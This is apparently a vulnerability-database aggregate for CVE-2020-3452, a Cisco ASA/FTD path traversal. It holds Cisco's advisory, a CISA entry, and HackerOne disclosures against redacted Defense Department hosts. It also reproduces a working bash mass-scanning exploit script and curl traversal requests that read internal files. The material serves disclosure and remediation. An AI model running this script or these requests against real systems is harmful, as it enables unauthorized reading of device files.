-eq \"Bad Request\" ]; then \necho \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\" \nelse \n \necho 
\"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\" \nwget \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt \nif [ -s $filename ]; then \necho \"downloaded!, $website is vulnerable to CVE-2020-3452.\" \nelse \necho \"not vulnerable!\" \nrm -rf $filename \nfi \nfi \n \nfi \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158648/ciscoasa97-filedelete.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2020-07-29T17:58:42", "description": "Exploit for hardware platform in category web applications", "cvss3": {}, "published": "2020-07-29T00:00:00", "type": "zdt", "title": "Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-07-29T00:00:00", "id": "1337DAY-ID-34760", "href": "https://0day.today/exploit/description/34760", "sourceData": "# Exploit Title: Cisco Adaptive Security Appliance Software 9.11 - Local File Inclusion\r\n# Google Dork: inurl:/+CSCOE+/\r\n# Date: 2020-08-27\r\n# Exploit Author: 0xmmnbassel\r\n# Vendor Homepage: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\r\n# Version: Cisco ASA Software >=9.14 except 9.11 Cisco FTD Software >=6.2.2 and 6.2.3,6.3.0,6.4.0,6.50,6.60\r\n# Vulnerability Type: unauthenticated file read\r\n# CVE: CVE-2020-3452\r\n\r\n\r\n#!/bin/bash\r\n\r\n\r\nread=\"%2bCSCOE%2b/portal_inc.lua\"\r\n\r\n\r\nhelpFunction()\r\n{\r\n echo \"\"\r\n echo -e \"\\t\\tCVE-2020-3452\"\r\n echo \"\"\r\n echo \"Usage: $0 -l targets.txt -r %2bCSCOE%2b/portal_inc.lua \"\r\n echo -e \"\\t-l for list of IPs in text file\"\r\n echo -e \"\\t-r file to read, default: %2bCSCOE%2b/portal_inc.lua\"\r\n echo -e \"\\t-i for single IP test\"\r\n exit 1\r\n}\r\n\r\nwhile getopts \"l:r:i:\" 
opt\r\ndo\r\n case \"$opt\" in\r\n l ) input=\"$OPTARG\" ;;\r\n r ) read=\"$OPTARG\" ;;\r\n i ) website=\"$OPTARG\" ;;\r\n ? ) helpFunction ;;\r\n esac\r\ndone\r\n\r\n\r\n\r\n#if $website is empty or $input is empty\r\nif [ -z \"$website\" ] && [ -z \"$input\" ]\r\nthen\r\n echo \"Some/all of the parameters are empty\";\r\n helpFunction\r\nfi\r\n\r\n#usage\r\n\r\n\r\nif [ -z \"$website\"];\r\n then\r\n while IFS= read -r line\r\n do\r\n name=$(echo $line | cut -c9-19)\r\n #echo \"testing $line\"\r\n filename=\"$name.txt\"\r\n #echo $response\r\n status=$(curl -LI $line\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n\r\n if [ $status -eq \"400\" ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n wget \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n\r\n if [ -s $filename ]; then\r\n echo \"$line/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n echo \"downloaded!, $line is vulnerable to CVE-2020-3452.\"\r\n\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n done < \"$input\"\r\n else\r\n\r\n name=$(echo $website | cut -c9-16)\r\n filename=\"$name.txt\"\r\n\r\n status=$(curl -LI $website\"/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=\"$read -o /dev/null -w '%{http_code}\\n' -s)\r\n if [ $status -eq \"Bad Request\" ]; then\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read doesn't exist!\"\r\n else\r\n\r\n echo \"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read exists, reading $read...\"\r\n wget 
\"$website/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=$read\" -O $name.txt\r\n if [ -s $filename ]; then\r\n echo \"downloaded!, $website is vulnerable to CVE-2020-3452.\"\r\n else\r\n echo \"not vulnerable!\"\r\n rm -rf $filename\r\n fi\r\n fi\r\n\r\nfi\n\n# 0day.today [2020-07-29] #", "sourceHref": "https://0day.today/exploit/34760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisco": [{"lastseen": "2022-12-22T12:17:41", "description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. As an example, this could allow an attacker to impersonate another VPN user and establish a Clientless SSL VPN or AnyConnect VPN session to the device as that user.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files, underlying operating system (OS) files, or VPN user login credentials.\n\nCisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.\n\nNote: Cisco has become aware of the availability of public exploit code and active exploitation of the vulnerability that is described in this advisory. 
Cisco encourages customers with affected products to upgrade to a fixed release as soon as possible.\n\nThis advisory is available at the following link:\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 [\"https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\"]", "cvss3": {}, "published": "2020-07-22T16:00:00", "type": "cisco", "title": "Cisco Adaptive Security Appliance Software and Firepower Threat Defense Software Web Services Read-Only Path Traversal Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-27T14:33:49", "id": "CISCO-SA-ASAFTD-RO-PATH-KJUQHB86", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "cvss": {"score": 7.5, "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Cisco Adaptive Security Appliance and Cisco Fire Power Threat Defense directory traversal sensitive file read", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-3452", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "hackerone": [{"lastseen": "2023-02-03T01:39:42", "bounty": 0.0, "description": "**Summary:**\nAccording to Cisco:\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\nThe vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. 
An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\nAn advisory can be found at the following link: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Step-by-step Reproduction Instructions\n\n1. In bash, use `curl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"` to prove you can read internal files such as the /+CSCOE+/portal_inc.lua file.\n2. Various internal files can be read, and some require using the --output command to output the binary data to a file as shown below:\n\n```\ncurl -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/session.js&default-language&lang=../\" --output session.js\n```\n\n## Suggested Mitigation/Remediation Actions\nUpdate the software to the latest version via the Cisco advisory linked above.\n\n## Impact\n\nA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device.\n\nThe web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-23T02:16:08", "type": "hackerone", "title": "U.S. Dept Of Defense: Path traversal on https://\u2588\u2588\u2588 allows arbitrary file read (CVE-2020-3452)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-13T18:09:37", "id": "H1:936399", "href": "https://hackerone.com/reports/936399", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:42", "bounty": 0.0, "description": "**Summary:**\nhttps://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 is vulnerable to a [Read-Only Path Traversal Vulnerability](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86)\n\n**Description:**\nGet request parameters at the `/+CSCOT+/translation-table` and the `/+CSCOT+/oem-customization` are not properly sanitized which allows for reading files within the webroot directory that are not intended to be readable.\n\n## 
Impact\nAn unauthenticated, remote attacker can read sensitive files located inside the webroot directory. \n\n## Step-by-step Reproduction Instructions\n### Using Browser\n1. Visit https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ in browser and note that you are prompted for a file download. This will be the source code for `portal_inc.lua` which is not normally accessible.\n2. To verify you cannot access this file normally, visit https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/portal_inc.lua and verify that you receive a page that says \"Wrong URL\".\n\n### Using Curl\n1. In a linux terminal, send the following `curl` command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n``` \n\nand\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua'\n```\nYou should receive the following output:\n\n```\nHTTP/1.1 200 
OK\nContent-Type: application/octet-stream\nTransfer-Encoding: chunked\nCache-Control: no-cache\nPragma: no-cache\nConnection: Keep-Alive\nDate: Fri, 24 Jul 2020 04:27:46 GMT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains\n\n-- Copyright (C) 2006-2018 by Cisco Systems, Inc.\n-- Created by otrizna@cisco.com\n\ndofile(\"/+CSCOE+/include/common.lua\")\ndofile(\"/+CSCOE+/include/browser_inc.lua\")\n\nlocal function compare(a,b) return a[\"order\"]<b[\"order\"] end;\n\nfunction INTERNAL_PASSWORD_ENABLED(name)\n return false;\n```\n2. To verify you should not be able to access this info, run the following `curl` command:\n\n```\ncurl -i -s -k -X $'GET' \\\n -H $'Host: \u2588\u2588\u2588\u2588\u2588' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'DNT: 1' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \\\n $'https://\u2588\u2588\u2588/%2bCSCOE%2b/portal_inc.lua'\n```\n\nYou should receive the following output:\n\n```\nHTTP/1.1 500 Internal Error\nCache-Control: no-cache\nPragma: no-cache\nConnection: Close\nDate: Fri, 24 Jul 2020 04:28:13 GMT\nX-Frame-Options: SAMEORIGIN\nStrict-Transport-Security: max-age=31536000; includeSubDomains\n```\n\n## Screenshots in Burpsuite showing the requests succeeding and failing\n\n### Success at https://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ which results in disclosure of the source code in `portal_inc.lua`\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n### Failure trying to access https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/portal_inc.lua\n\u2588\u2588\u2588\n\n## Suggested Mitigation/Remediation Actions\nUpgrade to the latest version of Cisco ASA or Cisco FTD.\n\n## 
References\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\nhttps://twitter.com/aboul3la/status/1286012324722155525\n\n## Impact\n\nCVSS Score: Base 7.5\nVector: [CVSS:3.1/CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:X/RL:X/RC:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X](https://tools.cisco.com/security/center/cvssCalculator.x?version=3.1&vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\nAn unauthenticated, remote attacker can read sensitive files located inside the webroot directory.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-07-24T05:12:21", "type": "hackerone", "title": "U.S. 
Dept Of Defense: https://\u2588\u2588\u2588\u2588\u2588 is vulnerable to CVE-2020-3452 Read-Only Path Traversal Vulnerability", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-08-13T18:08:40", "id": "H1:940384", "href": "https://hackerone.com/reports/940384", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T01:39:16", "bounty": 0.0, "description": "**Summary:**\n#_The affected IP_:\n\u2588\u2588\u2588\u2588\u2588\n\nHere is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.\nFor example to read \"/+CSCOE+/portal_inc.lua\" file.\n\nfor example:\n\n\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n\n## Suggested Mitigation/Remediation Actions\n\nCisco has released the fix https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThis vulnerability allows an unauthenticated, remote attacker to perform directory traversal attacks and read sensitive files on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-08-05T10:21:56", "type": "hackerone", "title": "U.S. Dept Of Defense: CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2020-09-03T17:23:05", "id": "H1:951508", "href": "https://hackerone.com/reports/951508", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:03", "bounty": 0.0, "description": "**Description:**\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. 
This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n## Impact\n\n## Step-by-step Reproduction Instructions\n\nto reproduce run the below curl command, and you will see the content of portal_inc.lua\n\ncurl -ik 'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../'\n\n## Impact\n\nA successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-05T22:03:17", "type": "hackerone", "title": "U.S. 
Dept Of Defense: https://\u2588\u2588\u2588\u2588 is vulnerable to cve-2020-3452", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-05-11T20:18:33", "id": "H1:998925", "href": "https://hackerone.com/reports/998925", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:28:04", "bounty": 0.0, "description": "Hello,\n\nI would like to report Path Traversal issue [ CVE-2020-3452 ] was found on https://\u2588\u2588\u2588\u2588\u2588/.\n\nPOC: https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Impact\n\nhttps://nvd.nist.gov/vuln/detail/CVE-2020-3452\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nFollow this URL to see the bug exists --> https://\u2588\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 3.6}, "published": "2021-03-26T14:34:07", "type": "hackerone", "title": "U.S. Dept Of Defense: Path Traversal - [ CVE-2020-3452 ]", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2021-05-11T20:16:50", "id": "H1:1137321", "href": "https://hackerone.com/reports/1137321", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:25:56", "bounty": 0.0, "description": "The following subdomain is vulnerable to CVE-2020-3452, which is an unauthenticated file read in Cisco ASA & Cisco Firepower.\n\n# URL:\nhttps://\u2588\u2588\u2588\u2588/\n\n# Vulnerable URL:\nhttps://\u2588\u2588\u2588/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\n# Resources:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nThe vulnerability could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system.\n\n## System Host(s)\n\u2588\u2588\u2588\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\n* Go to https://\u2588\u2588\u2588\u2588\u2588\u2588/+CSCOE+/logon.html\n* Intercept the request with Burpsuite\n* Send the request to Repeater\n* Change the URL path to the following 
`/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../` as an example to read \"/+CSCOE+/portal_inc.lua\" file.\n* You will get the portal_inc.lua file\n\n## Suggested Mitigation/Remediation Actions\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-06-15T18:52:28", "type": "hackerone", "title": "U.S. Dept Of Defense: [CVE-2020-3452] on \u2588\u2588\u2588\u2588\u2588\u2588\u2588", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452"], "modified": "2022-04-07T20:06:57", "id": "H1:1234925", "href": "https://hackerone.com/reports/1234925", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-02-03T02:26:13", "bounty": 0.0, "description": "I found out that https://\u2588\u2588\u2588/ was vulnerable to CVE-2020-3452.\n\nThe IP has a SSL certificate pointing to DoD.\n`curl -kv https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/`\n\nOutput:\n```\nServer certificate:\n* subject: \u2588\u2588\u2588\u2588\u2588\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System 
